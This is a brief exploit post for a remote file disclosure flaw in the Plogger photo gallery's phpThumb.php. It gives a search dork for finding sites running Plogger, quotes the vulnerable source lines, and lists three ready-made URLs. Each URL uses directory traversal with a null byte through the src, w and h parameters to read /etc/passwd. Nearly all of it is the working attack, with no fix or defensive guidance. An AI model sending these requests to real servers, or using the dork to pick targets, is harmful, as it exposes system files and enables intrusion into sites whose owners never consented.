# Plogger Remote File Disclosure Vulnerability
# http://www.plogger.org/
# dork : Powered by Plogger!
# author: Mr.tro0oqy (yemeni hacker)
# email : t.4@windowslive.com
 
exp :
 
Line 117:   if ($fp_source = @fopen($_GET['src'],'rb'))
 
www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?src=../../../../../../../../etc/passwd%00
 
Line 41:    $_GET['w'] = $matches[1];
Line 42:    $_GET['h'] = $matches[2];
 
www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?w=../../../../../../../../../etc/passwd%00
 
www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?h=../../../../../../../../../etc/passwd%00
 
 
greetz : all muslems (ramadan kreem)